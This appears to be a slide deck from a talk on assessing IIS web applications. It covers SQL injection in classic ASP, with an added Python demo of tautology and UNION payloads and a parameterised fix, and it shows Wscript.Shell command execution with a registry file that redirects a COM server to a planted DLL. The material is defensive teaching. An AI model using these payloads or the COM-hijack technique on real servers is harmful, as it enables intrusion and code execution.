Application Assessments On IIS
Welcome!
David Litchfield
(d.litchfield@atstake.com)
Vulnerability Scanners
Cybercop
I. S. S.
Cerberus Internet Scanner
What scanners do
They highlight known vulnerabilities in COTS products
Stocks-r-us.com
http://www.stocks-r-us.com/read_img.asp?IDN=00000008&IFN=AXYZPQ&IFE=png
http://www.stocks-r-us.com/read_img.asp?IDN=&IFN=&IFE=
Exception Handling
SQL Queries
' the "company" query-string value is spliced straight into the SQL text
strSQL = "select price from stocks where name = '" _
    & request.querystring("company") & "'"
http://www.wiretrip.net/rfp
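The two preceding slides (Exception Handling, SQL Queries) make one point: a value taken from the query string and concatenated into SQL lets the client rewrite the statement, and an unhandled database error then tells the attacker exactly how. The following is an added example, not code from the talk: it uses a constructed in-memory SQLite "stocks" table (hypothetical rows) in Python to show the talk's strSQL concatenation beside a parameterised version, a tautology that dumps every price, a UNION that reads the schema catalogue, and the raw error text a malformed value provokes.

```python
import sqlite3


def make_db():
    """Build a constructed stand-in for the talk's 'stocks' table (sample rows, not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE stocks (name TEXT, price REAL)")
    conn.executemany(
        "INSERT INTO stocks VALUES (?, ?)",
        [("ACME", 12.5), ("Globex", 47.0), ("Initech", 3.25)],
    )
    return conn


def price_concat(conn, company):
    """Mirrors the slide's strSQL: the untrusted value becomes part of the SQL text itself."""
    sql = "select price from stocks where name = '" + company + "'"
    return [row[0] for row in conn.execute(sql)]


def price_param(conn, company):
    """Hardened form: the value is bound as a parameter, so it can only ever be compared, never parsed."""
    sql = "select price from stocks where name = ?"
    return [row[0] for row in conn.execute(sql, (company,))]


def probe_error(conn, company):
    """Return the database's raw error message for a value that breaks the concatenated query,
    or None if the query ran. This is what an ASP page without error handling echoes to the browser."""
    try:
        price_concat(conn, company)
        return None
    except sqlite3.OperationalError as exc:
        return str(exc)


if __name__ == "__main__":
    db = make_db()
    print("normal lookup:      ", price_concat(db, "ACME"))
    # Tautology: the WHERE clause becomes ... name = 'x' or '1'='1', matching every row.
    print("tautology, concat:  ", price_concat(db, "x' or '1'='1"))
    print("tautology, param:   ", price_param(db, "x' or '1'='1"))
    # UNION: pull table names out of the catalogue through the 'price' column.
    print("schema via UNION:   ", price_concat(db, "x' union select name from sqlite_master where type='table' and '1'='1"))
    # A lone quote breaks the statement; the error text leaks the query structure.
    print("leaked error:       ", probe_error(db, "x'"))
    print("same input, param:  ", price_param(db, "x'"))
```

The parameterised function returns an empty list for every hostile input because the driver hands the value to the engine separately from the statement; the concatenated one returns whatever the attacker's SQL says. In classic ASP the equivalent is an ADODB.Command with a Parameters collection instead of string building, and the same error-handling lesson applies: catch the failure and return a generic page rather than the engine's message.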
Contact Service
<%
..
' binds to the local SMTP service via ADSI; SERVER_NAME comes from the request
Set SMTPObj = GetObject( _
    "IIS://" & request.servervariables("SERVER_NAME") & "/SMTPSVC")
..
%>
Wscript.Shell Object
Set WSObj = CreateObject("Wscript.Shell")
Read from the Registry
Write to the Registry
Execute commands
MSI.ASP
<%
Dim WshShell, strCMD, strCMD2, result
' both files were placed in the web root beforehand: the .reg rewrites a COM
' registration, the .msi then drives the Installer object it points at
strCMD = "cmd.exe /c c:\inetpub\wwwroot\msi.reg"
strCMD2 = "cmd.exe /c c:\inetpub\wwwroot\msi.msi"
Set WshShell = Server.CreateObject("Wscript.Shell")
On Error Resume Next
result = WshShell.Run(strCMD)
result = WshShell.Run(strCMD2)
%>
MSI.REG
REGEDIT4
[HKEY_CLASSES_ROOT\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32]
@="c:\\inetpub\\wwwroot\\foo.dll"
"ThreadingModel"="Both"
Summary
Understand the technology you're dealing with
Never trust user input anywhere
Ensure permissions are set properly
Don't trust third-party software until truly evaluated
Don't rely on client-side checking
Scanners won't find these problems; you will
Questions?